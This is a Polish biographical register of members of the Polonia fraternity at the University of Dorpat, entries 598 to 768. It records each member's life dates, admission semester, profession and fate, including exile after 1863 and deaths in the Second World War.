 598. Bolesław Konopnicki, (1841 - ?) - coetus II sem. 1871, adwokat w Mińsku [692]
 599. Jan Konosewicz, (1880 - 1914) - s. Gabriela, coetus II sem. 1903, zmobilizowany jako lekarz do armii rosyjskiej - poległ [1157]
 600. Ferdynand Konstantynowicz, (1883 - ?) - z Rygi, coetus II sem. 1907 [1202]
 601. Bohdan Kopeć, (1910 - 1984) - s. Witolda, brat Józefa (1364), coetus I sem. 1930/31, żołnierz września, lekarz, od 1942 w AK, z-ca komendanta okręgu AK Wilno - Północ, z-ca d-cy 2 Brygady. Po rozbrojeniu (pod Miednikami), aresztowany i w lipcu 1944 r. zesłany do ZSRR (obóz Diagilewo k. Kazania). W 1947 r. powrócił do Polski. Zastępca Ordynatora Oddziału Urologii Szpitala Wojewódzkiego w Olsztynie. [1436]
 602. Józef Kopeć, (1905-1934) - s. Witolda, brat Bohdana (1436), ochotnik WP (1920), coetus I sem. 1923/24, aplikant adw. w Wilnie [1364]
 603. Adolf Korabiewicz, (1822 - 1851) - brat Michała (237), coetus II sem. 1844, zmarł wkrótce po studiach [236]
 604. Michał Korabiewicz, (1823 - 1875) - brat Adolfa (236), coetus II sem. 1844, lekarz w Siedlcach [237]
 605. Jan Korczke, (1852 - 1872) - coetus I sem. 1870, zginął w pojedynku 25 III 1872 Dorpat [684]
 606. Brunon Korewo, (1847 - 1873) - brat Mieczysława (693), coetus II sem. 1866, zmarł w czasie studiów [644]
 607. Mieczysław Korewo, (1850 - ok. 1875) - brat Brunona (644), coetus II sem. 1871, adwokat, ziemianin w gub. kowieńskiej [693]
 608. Henryk Korkuć, (1905 - 3 maja 1970) - s. Stanisława, brat Jana (1363), coetus I sem. 1925/26, v.- prok. Sądu Okręgowego w Wilnie, po wojnie adwokat w Łodzi i Warszawie. Ok. 1965 emigrował do Kanady gdzie zmarł [1391]
 609. Jan Korkuć, (1902 - 1951) - s. Stanisława, brat Henryka (1391), ochotnik WP (1919 - 21), coetus I sem. 1923/24, prokurator Sądu Okręgowego w Lublinie. W AK (Służba Sprawiedliwości). Po powst. Warszawskim wywieziony do Niemiec. Po wyzwoleniu oficer Służby Sprawiedliwości w Kompaniach Wartowniczych na terenie Niemiec [1363]
 610. Hieronim Korpaczewski, (1849 - ?) - coetus I sem. 1873, lekarz w Warszawie [713]
 611. Bohdan Korsak, (1875 - 1961) - s. Bronisława, coetus I i II sem. 1894, członek zarządu Stow. Fil. Konwentu w Warszawie, sędzia Sądu Najwyższego [1098]
 612. Wiktor Korsak, (1820 - 1883) - s. Józefa, coetus I sem. 1839, uczestnik powstania 1863 r., zesłany [149]
 613. Władysław Korsak I, (1833 - ?) - ziemianin w pow. kobryńskim, coetus I sem. 1851, zesłany za powst. 1863 r. [390]
 614. Władysław Korsak II, (1863 - ?) - z Witebszczyzny, coetus II sem. 1884 [935]
 615. Kazimierz Korwin-Korotkiewicz, (1871 - przed 1928 ?) - s. Wincentego, coetus I sem. 1892, sędzia Sądu Okręgowego (w Łodzi) [1073]
 616. Józef Kosakowski, (1826 - przed 1889) - ziemianin, coetus II sem. 1847, za powst. 1863 r., zesłany [290]
 617. Józef Kosmowski, (1888 - 10 kwietnia 1974) - urzędnik Izb Skarbowych w Wilnie i Brześciu n. Bugiem [1223]
 618. Józef Kossarski, (1868 - ?) - s. Antoniego, z Kowieńszczyzny, coetus II sem. 1892, brat Onufrego (1067) [1083]
 619. Onufry Kossarski, (1869 - ?) - syn Hieronima, krewny Józefa (1083), coetus I sem. 1891, dyr. cukrowni [1067]
 620. Stanisław Kossko, (1901 - 1944) - ochotnik WP (1919 - 20), coetus II sem. 1920/21, ziemianin, przed wojną mieszkał na Litwie. Członek ZWZ - AK (w wywiadzie), aresztowany przez Gestapo w Królewcu, zamordowany w Auschwitz (23 I) [1337]

  Kajetan Kostecki.

 621. Kajetan Kostecki, (20 marca 1801 w Kaliszu - 23 września 1873 w Kaliszu) s. Józefa i Wiktorii z Kwaśniewskich, absolwent Kaliskiej Szkoły Wojewódzkiej, student farmacji UW, student med. UD 1832, c. I sem. 1832, absolwent med. Akademii Medyko-Chirurgicznej w Wilnie 1833, po studiach lekarz w Aleksopolskim Pułku Strzelców w Dagestanie, po powrocie lekarz w Warszawie, Tomaszowie Mazowieckim, lekarz Powiatowy w Pilicy 1839-51, później m.in. lekarz Szpitala Świętej Trójcy w Kaliszu 1858-59, lekarz powiatu kaliskiego 1859-1870 (?), członek Rady Miejskiej w Kaliszu, nagrodzony medalem za 20 lat nienaganej służby oraz brązowym medalem na pamiątkę wojny krymskiej 1853-1856 [nr ew. 36]

 622. Lucjan Kostrowski, (1809 - 1889) - s. Samuela, uczestnik powst listopadowego, ziemianin, coetus II sem. 1929. Wg ustnej tradycji konwentowej był inicjatorem gremialnego pójścia 17 konwentowiczów do powstania listopadowego [26]
 623. Piotr Koszko (Kossko?), (1857 - ?) - z Witebszczyzny, student filologii, coetus II sem. 1880 [843]

  Bohdan Zyndram Kościałkowski, Wilno 1929 r.

 624. Bohdan Zyndram Kościałkowski, (1898 - 1967), s. Zygmunta, coetus II sem. 1918, radca MSZ, wywieziony do ZSRR, delegat ambasady RP w Czimkencie (1942), chargé d’affairs w Bagdadzie (1945), następnie w Bejrucie. Od 1948 r. na emigracji w Argentynie, gdzie zmarł w biedzie [1306]

 625. Gabriel Zyndram Kościałkowski, (1844 - 1915) - brat Michała (612), coetus II sem. 1862, urzędnik państwowy w Rydze [613]
 626. Konstanty Zyndram Kościałkowski, (1846 - 1920) - ziemianin z gub. kowieńskiej, coetus II sem. 1864 [623]
 627. Michał Zyndram Kościałkowski, (1841 - 1914) - brat Gabriela (613), coetus II sem. 1862, urzędnik państwowy w Rydze [612]
 628. Władysław Kościuszko, (1817 - ?) - coetus II sem. 1838, urzędnik w kancelarii ks. Paskiewicza [144]
 629. Alfred Kotowicz, (1858 - ?) - coetus I sem. 1878, „uwieczniony” w żartobliwym poemacie J. Weyssenhoffa „Pieśń o Robercie i Kotku”, ziemianin z gub. mińskiej [785]
 630. Jan Kotowicz, (1865 - 1937) - s. Ksawerego, coetus I sem. 1889, ziemianin w pow. wileńskim [1040]
 631. Franciszek Kowalewski, (1829 - przed 1889) - coetus II sem. 1852, lekarz [427]
 632. Oskar Kowalewski, (1820 - przed 1889) - coetus II sem. 1838, lekarz w Petersburgu [145]
 633. Bronisław Kowerski, (1874 - po 1934) - s. Hipolita, coetus II sem. 1895, adwokat, ziemianin, prokurator w Wilnie i Warszawie [1109]
 634. Bolesław Kownacki, (1864 -1917) - s. Leona, brat Platona (988), coetus II sem. 1886, lekarz na Lubelszczyźnie [979]
 635. Ferdynand Kownacki, (1861 - po 1919 ?) - s. Antoniego, coetus I sem. 1882, lekarz w Kalwarii (gub. kowieńska) [869]
 636. Platon Kownacki, (1865 - po 1913?) - s. Leona, brat Bolesława (979), coetus I sem. 1887, lekarz w Kalwarii (gub. kowieńska) [988]
 637. Jerzy Kowzan, (1912-1978) - coetus I sem. 1931/32, w AK w Warszawie, więziony na Pawiaku, wywieziony do któregoś z obozów koncentracyjnych w Niemczech. Po wojnie w Kompaniach Wartowniczych [1449]
 638. Zbigniew Kozarzewski, (1870 - ?) - z pow. płockiego, coetus II sem. 1889 [1048]
 639. Bohdan Koziełł-Poklewski, (1908 - 1939) - s. Józefa (995), brat Władysława (1399), coetus I sem. 1930/31, ziemianin, poległ 10 IX - wieś Kamieńczyk k/Wyszkowa [1434]
 640. Jerzy Koziełł-Poklewski, (1918 - 1954) - s. Ottona, coetus I sem. 1936/37, ziemianin, żołnierz ZWZ - AK, od 1943 r. w W-wie („Kedyw”). Zamordowany w więzieniu na Rakowieckiej w Warszawie, w czasie „śledztwa” (25 VII) [1497]
 641. Józef Koziełł-Poklewski, (1863 - 1940) - s. Władysława, brat Mariana (1038), coetus I sem. 1887, lekarz w Widzach, pow. brasławski, ziemianin [995]
 642. Kazimierz Koziełł-Poklewski, (1902-1987) - s. Mariana (1038), pragnął być w Konwencie, ale przed wojną „nie zdążył”, przyjęty na emigracji w Londynie. W 1941 wywieziony do ZSRR - wyszedł z II Korpusem, por. artylerii [1512]
 643. Marian Koziełł-Poklewski, (1865 - 1937) - brat Józefa (995), stryj Władysława (1399) i Bohdana (1434), coetus I sem. 1889, ziemianin w pow. brasławskim [1038]

  Władysław Koziełł-Poklewski, 1929/30 r.

 644. Władysław Wincenty Koziełł-Poklewski, (29 marca 1905 w maj. Kowalew(o) na Wileńszczyźnie - 1940 w Katyniu) s. Józefa (nr ew. 995) i Marceliny z d. Szachno, branek Mariana (nr ew. 1038), siostrzeniec Bohdana (nr ew. 1001), brat Bohdana (nr ew. 1434), brat stryjeczny Kazimierza (nr ew. 1512), absolwent Gimnazjum w Dzisnej 1926, student rolnictwa USB, a następnie Państwowej Wyższej Szkoły Rolniczej w Cieszynie, inż. rolnik, coetus I sem. 1926/27 [nr ew. 1399], ziemianin, gospodarował w maj. rodzinnym Kowalew(o), odznaczony Virtuti Militari, ppor. rez, w wojnie obronnej 1939 w w baonie KOP „Łużki”, brał udział w walkach z wojskami sowieckimi, dostał się do niewoli sowieckiej, osadzony w obozie w Kozielsku, zamordowany w Katyniu w kwietniu-maju 1940, w 2007 mianowany pośmiertnie do stopnia porucznika [Źródła: J. Trynkowski, Album Polonorum, Warszawa 2018, s. 400]

 645. Eugeniusz Kozłowski, (1857 - ?) - coetus II sem. 1879, prowizor aptekarski [816]
 646. Konstanty Kozłowski, (1810 - 1854 ) - coetus I sem. 1833, nauczyciel, zm. w Szawlach [47]
 647. Wojciech Kozłowski, (1875 - 1942) - s. Przemysława, coetus II sem. 1898, lekarz w Brudzewie k. Turka [1118]
 648. Stanisław Kożuchowski, (1855 - po 1939 ?) - s. Józefa, coetus II sem. 1875, chirurg w Warszawie [742]
 649. Wacław Kożuchowski, (1861 - ?) - z Kaliskiego, studiował prawo w latach 1882-1883, coetus I sem. 1882 [871]
 650. Józef Kordzikowski, (1856 - 1919) - s. Józefa, coetus I sem. 1876, znakomity mówca konwentowy, ziemianin, historyk, poeta [746]
 651. Mieczysław Kosielski, (1866 - po 1939 ?) - s. Karola, coetus II sem. 1890, Dyr. Towarzystwa Kredytowego w Lwowie [1057]
 652. Czesław Krajewski, (1910 - 1939) - brat Henryka (1477), coetus I sem. 1929/30, lekarz w Łodzi, poległ 11 IX 1939 r. pod Łodzią [1428]
 653. Henryk Krajewski, (1912 - 24 lutego 1979) - coetus II sem. 1933/34, ppor. WP, żołnierz września, odzn. Krzyżem Walecznych. W oflagu Murnau, po wojnie w Warszawie [1477]
 654. Wincenty Krajewski, (1883 - 1932) - s. Wincentego, coetus I sem. 1907, podprokurator w Zamościu, notariusz w Tyszowcach lub. [1171]
 655. Ksawery Ignacy hr. Krasicki, (1853 - 1915) - s. Marcelego, ziemianin na Wołyniu, coetus I sem. 1874 [728]
 656. Lucjan Kraszewski, (1820 - 1892) - s. Jana, brat Józefa Ignacego Kraszewskiego - pisarza, coetus II sem. 1839, malarz, fotografik, za powstanie 1863 r. zesłany [155]
 657. Michał Tadeusz Kraszewski, (1912 - 20 maja 1993) - s. Teofila, coetus I sem. 1932/33, lekarz USB, chirurg, kpt. WP, przez Rumunię dostał się na Zachód, był lekarzem w RAF (polskie dywizjony). Po wojnie mieszkał na Borneo. Zmarł w Edynburgu (Szkocja) [1465]
 658. Karol Artur Krauze, (1846 - 1874) - coetus I sem. 1865, pastor e.a. Przasnysz [629]
 659. Adolf Krempin, (1864 - 1940) - s. Augusta, coetus II sem. 1884, pastor e.a. w Kole [938]
 660. Franciszek Królewiecki, (1822 - 1880) - coetus I sem. 1841, lekarz w rosyjskiej flocie [179]
 661. Henryk Krug, (1882 - 1920) - s. Edwarda, coetus II sem. 1906, lekarz, kpt WP, zginął w czasie odwrotu w sierpniu 1920 r. [1168]
 662. Maurycy Krupowicz, (1823 - 1891) - s. Antoniego, coetus I sem. 1842, historyk, archiwista [200]
 663. Alfred Krusche, (1858 - 1919) - s. Beniamina, coetus II sem. 1878, lekarz w Łodzi, działacz społ., członek redakcji „Czasopismo Lekarskie” [788]
 664. Antoni Kruszewski, (1832 - 1915) - coetus II sem. 1853, ziemianin w gub. warszawskiej [469]
 665. Michał Krydel, (1816 - ?) - coetus I sem. 1834, ziemianin z powiatu lidzkiego [64]
 666. Antoni Kryszka, (1818 - 1912) - s. Jakuba, coetus II sem. 1840, lekarz - farmakolog, prof. Uniw. Warszawskiego [170]
 667. Henryk Krzywicki, (1824 - po 1882) - lekarz, coetus I sem. 1847, za powst. 1863 r. zesłany [276]
 668. Kazimierz Krzywicki, (1820 - 1883) - s. Teodora, coetus I sem. 1841, polityk konserwatywny, autor reformy szkolnej w Królestwie Polskim [188]
 669. Bronisław Krzywobłocki, (1909 - po 1945) - s. Mieczysława, coetus II sem. 1927/28, lekarz, adiunkt w klinice dermatologicznej USB, w czasie wojny dyr. szpitala w Żyrmunach (współpraca z służbą sanit. AK), aresztowany przez NKWD, zmarł w sowieckim więzieniu w Lidzie lub na zesłaniu [1422]

  Jan Krzyżanowski, ok. 1910 r.

 670. Jan Kacper Krzyżanowski, (1888 - 1932) herbu Dębno, s. Kacpra i Stefanii Korybut-Daszkiewicz, brat Kazimierza (Arkonia), Bohdana i Wawrzyńca (Welecja), c. II sem. 1907, kpt. audytor WP, Sędzia śledczy Sądu Wojskowego, adwokat [nr ew. 1198]

 671. Teodor Küntzel, (1809 - 1879) - s. Jana, coetus I sem. 1833, pastor e.a. [50]
 672. Kajetan Kucharski, (1862 - 1919) - s. Józefa, coetus II sem. 1884, lekarz w Króśniewicach (pow. kutnowski) [934]
 673. Jan Kulczycki, (1885 - 1935) - brat Włodzimierza (1184), coetus I sem. 1908, adwokat w Warszawie [1214]
 674. Włodzimierz Kulczycki, (1887 - 1945) - brat Jana (1214), coetus II sem. 1907, por. WP (1918-21), sędzia Sądu Okręgowego w Warszawie [1184]
 675. Antoni Kulesza, (1834 - 1893) - s. Józefa, coetus I sem. 1854, lekarz w Samarze - działacz miejscowej Polonii [476]
 676. Władysław Kulikowski, (1832 - ?) - coetus I sem. 1852, zmarł zapewne wkrótce po studiach [422]
 677. Bronisław Kułakowski, (1865-1924) - s. Romualda (wnuk Feliksa -filarety), coetus II sem. 1888, adwokat. Związany z PPS, emigrował do USA, działa tam w nurcie niepodległościowym, wielbiciel J. Piłsudskiego (był współzałożycielem Komitetu im. J.P. - z którego wyrósł Instytut im. J. P.), członek red. szeregu czasopism emigracyjnych [1027]
 678. Kornel Kuncewicz, (1833 - 1864) - coetus I sem. 1857, lekarz, zmarł wkrótce po studiach [536]
 679. Romuald Kuncewicz, (1825 - 1855) - coetus II sem. 1844, pastor e.r., nauczyciel gimnazjum w Słucku [238]
 680. Szymon Kuncewicz, (1801 - przed 1889) coetus I sem. 1829, lekarz , uczestnik powst. listopadowego, zesłany? [21]
 681. Marian Kunicki, (1865 - 1943) - coetus I sem. 1888, notariusz w Lublinie, jako emeryt w Bydgoszczy - wyrzucony przez Niemców, schronił się w Warszawie gdzie zmarł. Autor wspomnień: pt. “Fragmenty wspomnień z Dorpatu” (Lublin 1927) [1017]
 682. Michał Kuniewicz, (1828 - 1856) - coetus II sem. 1851, zmarł wkrótce po studiach [407]
 683. Teodor Kunzmann, (1851 - 1921) - coetus I sem. 1871, pastor e.a., superintendent p³ocki [687]
 684. Felicjan Kurnatowski, (1859 - po 1913) - coetus II sem. 1879, pastor e.r. w Słucku [813]
 685. Henryk Kurnatowski, (1809 - 1889) - s. Aleksandra, kuzyn Tytusa (4), założyciel Konwentu Polonia, dyr. gimnazjum w Wilnie [12]
 686. Józef Dobrogost Kurnatowski, (1817 - ok. 1899) - stryj Przemysława [49], ziemianin – maj. Kurnatowszczyzna w gub. Grodzieńskiej, coetus II sem. 1835 [92]
 687. Konstanty Kurnatowski, (1878 - 1966) - s. Oskara (462), coetus II sem. 1898, pastor e.r. Prof. teol. Uniw. Witolda Wlk. w Kownie, v-prezydent Konsystorza Kościoła Reformowanego na Litwie. W 1938 r. został superintendentem generalnym w Wilnie. W 1939 r. chroniąc się przed bolszewikami emigrował na Zachód [1119]
 688. Marian Kurnatowski, (1839 - po 1874) - coetus I sem. 1859, po powst. 1863 r. na emigracji do 1874 r., ziemianin w pow. telszewskim gub. kowieńskiej [585]
 689. Oskar Kurnatowski, (1834 - 1911) - s. Tytusa (4), coetus II sem. 1853, pastor e.r., superintendent żmudzki [462]
 690. Przemysław Kurnatowski, (1815 - 1842) - krewny Józefa [92], coetus I sem. 1833, nauczyciel [49]
 691. Tytus Kurnatowski, (1802 - 1845) - s. Jana, kuzyn Henryka (12), przed Dorpatem stud. Uniw. Wileńskiego, założyciel Konwentu Polonia. Pastor e.r., wicesuperintendent w Wilnie. [4]
 692. Witold Kurnatowski, (1827 - ?) - s. Jana, ziemianin w pow. Sieradzkim, coetus I sem. 1848 [302]
 693. Zygmunt Kurnatowski, (1844 - ok. 1899) -s. Józefa (92), coetus II sem. 1865, urzędnik, członek Sądu Powiatowego w Baku [632]
 694. Julian Kurtz, (1828 - 1873) - s. Karola, coetus II sem. 1847, ziemianin, za powst. 1863 r. zesłany [295]
 695. Aleksander Kwantski, (1811 - 1848) - coetus I sem. 1837, pastor e.r. , w m. Kopyś [113]
 696. Stanisław Kwaśnicki, (1871 - 1942) - s. Jana, coetus II sem. 1893, lekarz w Równem [1092]
 697. Tadeusz Kwieciński, (1886 - 1968) - coetus II sem. 1907, por. I korpusu WP (1917-18), por. 22 p. piech. (1918- 20). Urzędnik Okręgowej Dyr. Kolei w Toruniu [1186]
 698. Rajmund Lande, (1864 - ?) - coetus I sem. 1884, lekarz [928]
 699. Ludomir Landsberg, (1840 - ?) - coetus II sem. 1856, urzędnik bankowy w Wilnie [531]
 700. Władysław Landsberg, (1831 - 1900) - s. Tomasza, coetus II sem. 1854, nauczyciel w Warszawie, uczestnik powstania 1863 r., na emigracji we Francji, następnie w Zakopanem [496]
 701. Włodzimierz Landsberg, (1837 - ?) - coetus I sem. 1857, urzędnik kolejowy w Petersburgu [554]
 702. Władysław Laski, (1831 - 1889) - s. Aleksandra, coetus II sem. 1848, dyr. banku w Petersburgu [318]
 703. Rajnold Laudon, (1849 - 1893) - coetus I sem. 1871, nauczyciel gimnazjalny w Warszawie [688]
 704. Władysław Lebecki, (1888 - 1918) - s. Waleriana, coetus II sem. 1911, por. 7 p. uł. (w Korp. Wschodnim), poległ po Niemirowem[1259]
 705. Emil Leischner, (1849 - ?) - z Wielkopolski, coetus II sem. 1867 [656]
 706. Kazimierz Lembke, (1828 - 1897) - coetus II sem. 1849, pastor e.a. w Dąbiu i Władysławowie [341]
 707. Waldemar Lembke, (1864 -?) - coetus II sem. 1885, lekarz, zmarł na Kaukazie [961]
 708. Jerzy Leśniewski, (1916 - 8 listopada 2002 w Warszawie) - s. Leonarda, coetus I sem. 1938/39, lekarz medycyny USB, żołnierz września (odzn. Virtuti Militari), por AK (Sokołów Podlaski), odzn. Krzyżem Walecznych. W 1942 r. trafił do Auschwitzia, przeniesiony do Mauthausen, uciekł kilka dni przed wejściem Amerykanów, unikając rozstrzelania. W kraju dokończył studia medyczne - lek. rentgenolog, pochowany na Cmentarzu Powązkowskim [1508]
 709. Józef Lewandowski, (1826 - 1851) - coetus II sem. 1848, zmarł w czasie studiów [314]
 710. Kazimierz Lewandowski, (1829 - 1848) - coetus I sem. 1847, zmarł jako student [278]
 711. Paweł Lewoniewski, (1863 - ?) - z gub. kowieńskiej, coetus I sem. 1883, lekarz? [902]
 712. Zygmunt Ludwik Liebkind-Lubodziecki, (1847 - ?) - coetus I sem. 1872, urzędnik w Tow. Akc. „Lilpop, Rau i Löwenstein”[696]
 713. Jan Lilienfeld, (1895 - ?) - (14 [16] grudnia1895 w Sackenhausen w Kurlandii - 15 stycznia 1960 w Greenville w Pensylwanii w Stanach Zjednoczonych) s. Aleksandra i Rozalii z h. Mohlów, przed II wojną mieszkał na Łotwie, c. II sem. 1918 [nr ew. 1305], prof. na Thiel Collage w Greenville [Źródło (poza wskazanymi poniżej spisu członków): Archiwum (baza danych osobowych) Kurlandzko-Inflanckie]
 714. Bolesław Limanowski, (1835-1935) - s. Wincentego, coetus II sem. 1858, Gospodarz „Ogółu”. Działacz spiskowy przed 1863 r. - zesłany. Działacz socjalistyczny, publicysta, historyk, socjolog. Senator RP - nestor socjalizmu polskiego. [579]
 715. Włodzimierz Kazimierz Lindorf, (1874 - 1935) - coetus II sem. 1899, nauczyciel gimnazjalny w Warszawie [1127]
 716. Stanisław Linke, (1892 - 1939) - s. Juliusza, coetus I sem. 1912, lekarz , ppłk. WP, zmarł z ran 3 X w bitwie pod Kutnem [1264]
 717. Edward Jan Lipiński, (1866 - 1930) - s. Józefa, coetus I sem. 1889, lekarz w Warszawie [1037]
 718. Stefan Lipiński, (1805 - 1879) - brat Tomasza (30), założyciel Konwentu Polonia, pastor e.r. gen. superintendent w Wilnie. Ordynował na śmierć Sz. Konarskiego [1]
 719. Tomasz Lipiński, (1809 - 1885) - brat Stefana (1), coetus II sem. 1830, sekretarz Kolegium Kalwińskiego w Wilnie [30]
 720. Teodor Lipkau, (1823 - ?) - coetus I sem. 1847, lekarz, zm. w Paryżu [282]
 721. Józef Lipkowski, (1860 - 1931) - s. Leonarda, coetus I sem. 1880, lekarz, wstąpił do zakonu o.o. Palotynów w 1909 r. [827]
 722. Zygmunt Loppe, (1872 - 1919) - s. Gustawa, coetus II sem. 1893, pastor e.a. w Łucku [1087]
 723. Józef Lissowski, (ok. 1818 - przed 1852) - z Wilna, student medycyny, coetus II sem. 1840, zmarł w czasie studiów [172]
 724. Juliusz Lohrer, (1832 - 1912) - s. Mateusza, coetus I sem. 1857, lekarz w Łodzi, uczestnik powst. 1863 r. [549]
 725. Zbigniew Lorenc, (1916 - 1991) - coetus I sem. 1935/36, lekarz, po wojnie w USA, gdzie zmarł [1489]

  August Karol Loth, 1895 r.

 726. August Karol Loth, (12 czerwca 1869 w Warszawie - 9 stycznia 1944 w Warszawie) s. Henryka Augusta i Anny Amalii z d. Korczki, absolwent Gimnazjum Rządowego Męskiego w Warszawie, student i absolwent Wydziału Teologii Ewangelickiej UD 1888-1892, c. II sem. 1888 [nr ew. 1024] , orydnowany na duchownego ewnagelicko-augsburskiego 1892, pastor parafii ewangelicko-augsburskiej św. Trójcy w Warszawie 1899-1944 (od 1920 I pastor zboru), od 1923 radca duchowny konsystorza, od 1937 senior diecezji warszawskiej, w 1939 aresztowany przez Niemców, po zwolnieniu uczestniczył w konspiracji Kościoła, organizator i prezes Towarzystwa Polskiej Młodzieży Ewangelickiej, współwydawca „Zwiastuna Ewangelicznego”, red. nacz. „Głosu Ewangelickiego”, współorganizator Gimnazjum im. Mikołaja Reja w Warszawie, działacz społeczny, sekretarz Towarzystwa b. Wychowanków Uniwersytetu w Dorpacie, prezes 1919-25 a później honorowy prezes Klubu Sportowego “Polonia” w Warszawie, pochowany w grobie rodzinnym na Cmentarzu Ewangelicko-Augsburskim w Warszawie [szerzej Barbara Żłobicka, Loth August Karol, (w:) Polski Słownik Biograficzny, t. 17, Wrocław 1972, s. 565 i n.]

 727. Wacław Lubieński, (1891 - 1919) - ochotnik WP (1918), coetus II sem. 1912, kpt - lekarz, poległ 11 IV w obronie Wilna przed bolszewikami. Pochowany na Rossie w Wilnie, na cmentarzyku obok grobu Matki i Serca J. Piłsudskiego [1273]
 728. Jerzy Lubieniecki, (1902- 1986) - ochotnik WP (1920 - 21), powstaniec śląski, coetus II sem. 1923/24, prawnik, ziemianin. Po wojnie przyjeżdżał na zebrania filisterskie. Zmarł we Wrocławiu [1378]
 729. Jan Luboiński, (1898 - po 1960) - ochotnik WP (1918 - 20), coetus II sem. 1920/21, zapewne wywieziony do ZSRR, wyszedł z II Korpusem (?), po wojnie w Argentynie [1326]
 730. Antoni Lubowidzki, (1833 - 1907) - s. Franciszka, coetus II sem. 1854, za powst. 1863 r. zesłany. Notariusz w Płocku. Dziad Wł. Broniewskiego [495]
 731. Teodor Ludwig, (1825 - 1882) - coetus II sem. 1845, pastor e.a. w Wiskitkach i Łomży [257]
 732. Wincenty Lutosławski, (1863 - 1954) - s. Franciszka, student Politechniki Ryskiej, przyjęty do Arkonii 1881 (nr ew. 196), skreślony 1882, student Uniwerytetu w Dorpacie, coetus I sem. 1883 Konwent Polonia, filozof, krytyk literacki, doc. Uniw. w Kazaniu, prof. USB, UJ, członek PAU, autor pamiętników [896]
 733. Feliks Łagodziński, (1867 - 1936 ?) - coetus II sem. 1890, miał w Radomiu „Hotel Europejski”, aptekę, był prezesem Stow. Kupców [1060]
 734. Remigiusz Ławcewicz, (1865 - 1931) - coetus II sem. 1887, lekarz w Kownie [1005]
 735. Szczepan Ławcewicz, (1903 - 1944) - coetus I sem. 1922/23, mieszkał na Litwie, lekarz, w czasie wojny w AK, w wileńskim Kedywie. Aresztowany przez Gestapo w maju 1944, po ciężkich torturach, zamordowany 4 VII [1355]
 736. Kazimierz Ławicki, (1861 - 1898) - coetus I sem. 1881, lekarz w Ostrołęce [857]
 737. Edward Łazarowicz, (1819 - ?) - coetus II sem. 1837, urzędnik, następnie ksiądz katol. [124]
 738. Witold Łaźniewski, (1865 - 1938) - s. Mikołaja, coetus II sem. 1884, dr chemii i filoz., botanik, ziemianin maj. Musuły pod Grodziskiem, podróżnik [941]
 739. Jerzy Łempicki, (1907 - 1978) - coetus I sem. 1928/29, ppor. WP, kampania wrześniowa (odzn. Krzyżem Walecznych|). Wojna w oflagu, po wojnie na emigracji, w Londynie, pracował jako kucharz [1425]
 740. Antoni Łopaciński, (1816 - 1855) - s. Józefa, brat Władysława (69), ziemianin, coetus I sem. 1834 [68]
 741. Klaudiusz Łopaciński, (1827 - ?) - s. Aleksandra, coetus I sem. 1851, członek Zw. Bratniego Młodzieży Lit. (1848), ziemianin [381]
 742. Władysław Łopaciński, (1815 - 1890) - s. Józefa, brat Antoniego (68), ziemianin, coetus I sem. 1834 [69]
 743. Otton Łopatto, (1861 - 1881) - s. Jana, coetus II sem. 1879, zmarł w czasie studiów [812]
 744. Konrad Łoziński, (1885 -1936) - coetus I sem. 1909, ochotnik WP (1918 - 1922) mjr WP, odznaczony Virtuti Militari i Krzyżem Walecznych, ziemianin [1232]
 745. Zygmunt Ługowski, (1877 - po 1934) - coetus II sem. 1902, lekarz, kpt. WP [1150]
 746. Stanisław Łuniewski, (1849 - ?) - coetus II sem. 1872, dr praw, urzędnik Magistratu w Warszawie [701]
 747. Karol Maciejewski, (1828 - 1911) - coetus II sem. 1849, prawnik, nauczyciel w Wilnie, uczestnik powst. 1863 r., sędzia i rejent w Warszawie [346]
 748. Bronisław Mackiewicz, (1844 - ?) - coetus I sem. 1862, mieszkał w gub. kowieńskiej [607]
 749. Julian Mackiewicz, (1829 - ?) - coetus II sem. 1850, adwokat w Wilnie [375]
 750. Konstanty Mackiewicz, (1888 - 1972) - brat Leona (1307), coetus II sem. 1908, ziemianin z Grodzieńszczyzny [1220]
 751. Leon Mackiewicz, (1899 - 1921) - brat Konstantego (1220), coetus II sem. 1919/20, pierwszy prezes Konwentu w Wilnie, ochotnik WP (1919-20) [1307]
 752. Piotr Mackiewicz, (1827 - 1866) - s. Wincentego, coetus I sem. 1853, za powst. 1863 r. zesłany, zmarł (zabity) w gub. tomskiej [441]
 753. Zygmunt Mackiewicz, (1901 - 11 maja 1985) - coetus I sem. 1923/24, magister paucandi Stulecia, POW, ochotnik WP (1920 - 23), mjr. 23 p. uł. Grodz., Krzyż Walecznych (za kampanię wrześniową), oflag Murnau. Po wojnie w Wlk. Bryt. [1371]
 754. Adam Majewski, (1831 - ?) - coetus II sem. 1853, lekarz, ziemianin w pow. połockim [467]
 755. Adolf Majewski, (1826 - 1893) - s. Jana, coetus I sem. 1852, lekarz ginekolog w Wilnie [414]
 756. January Majewski, (1882 - po 1939) - coetus II sem. 1910, notariusz, w Baranowiczach, „zaginął” w ZSRR [1256]
 757. Konrad Majewski, (1857 - przed 1925) - z Radomia, coetus II sem. 1880, lekarz [840]
 758. Juljan Majkowski, (1833 - 1917) - s. Macieja, coetus I sem. 1853, lekarz balneolog (Busko), działacz społ., za powst. 1863 r. aresztowany, swą willę w Busku nazwał „Polonia” [453]
 759. Bolesław Makowiecki, (1869 - 1897) - coetus I sem. 1889, lekarz, asystent Instytutu Oftalmicznego w Warszawie [1035]
 760. Stefan Maksymowicz, (1829 - ?) - coetus I sem. 1854, zmarł b. młodo [477]
 761. Andrzej Malewski, (1830 -1859) - s. Ludwika, coetus I sem. 1851, lekarz w Iżewsku (gub. wiacka) [392]
 762. Leon Malhomme de la Roche, (1888 - 1940) - s. Mikołaja, coetus I sem. 1912, konsul RP w Bytomiu, Opolu, Morawskiej Ostrawie, wicewojewoda katowicki, 23 IX 1939, aresztowany przez NKWD, wywieziony do ZSRR i zamordowany [1269]
 763. Adam Czesław Malinowski, (1910 - 4 listopada 1988) - coetus I sem. 1933/34, lekarz, żołnierz AK, po wonie lekarz okrętowy w PMH [1472]
 764. Jan Mandzelowski, (1809 - 1885) - s. Jana, coetus II sem. 1929, pastor e.r., generalny superintendent wileński [27]
 765. Władysław Mandzelowski, (1837 - 1901), s. Jana (27), coetus I sem. 1857, pastor e.r. w Izabelinie [545]
 766. Karol Gustaw Manitius, (1823-1904) - s. Karola, coetus I sem. 1843, pastor e. a., represjonowany w 1863 r., superintendent generalny w Królestwie Polskim [216]
 767. Zygmunt Otto Manitius, (1852 - 1911) - s. Karola (216), coetus II sem. 1870, pastor e.a. w Łodzi [681]
 768. Gustaw Manteuffel-Schoege, (1832-1916) - s. Jakuba, brat Jana (454), coetus I sem. 1852, historyk Inflant (oraz Konwentu) [421]
